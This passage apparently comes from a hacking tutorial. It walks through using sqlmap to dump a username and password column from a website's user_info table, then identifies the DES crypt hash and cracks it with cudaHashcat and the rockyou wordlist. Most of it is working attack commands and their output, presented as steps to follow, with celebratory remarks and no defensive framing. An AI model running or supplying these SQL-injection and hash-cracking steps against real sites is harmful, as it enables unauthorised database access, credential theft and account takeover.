sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump



Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
 

Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection

You're probably getting used to how the SQLMAP tool works. Use the following command to extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump



TADA!! We have password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
 
This is a hashed password. Hashing is one-way, so it is not "decrypted"; instead we crack it by hashing candidate passwords from a wordlist until one produces the same hash.



To Crack the Password
Kali Linux provides a nice tool we can use to identify which type of hash this is. On the command line type the following and, at the prompt, paste the hash value:
command : hash-identifier
 
First of all I need to know which hash mode to use for DES hashes. So let's check that:
cudahashcat --help | grep DES
 
 
So it's either 1500 or 3100. The hash 24iYBc17xK0e. is 13 characters long (a 2-character salt followed by 11 characters), which is the traditional DES-based crypt(3) format that hashcat calls descrypt, mode 1500; 3100 is the Oracle 7+ format and does not apply here. (MySQL itself did not produce this hash; the web application stored a crypt(3) hash in the user_password column.)
I am running a computer that's got an NVIDIA graphics card. That means I will be using cudaHashcat. On my laptop I have an AMD ATI graphics card, so there I will be using oclHashcat. If you're on VirtualBox or VMware, neither cudaHashcat nor oclHashcat will work. You must install Kali on either a persistent USB or a hard disk. Instructions are on the website; search around.
I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt



 
Plain (CPU) hashcat at the time did not list a mode for this DES hash in its help menu. However, both cudaHashcat and oclHashcat found and cracked it.
Anyhow, so here's the cracked password: abc123. 24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.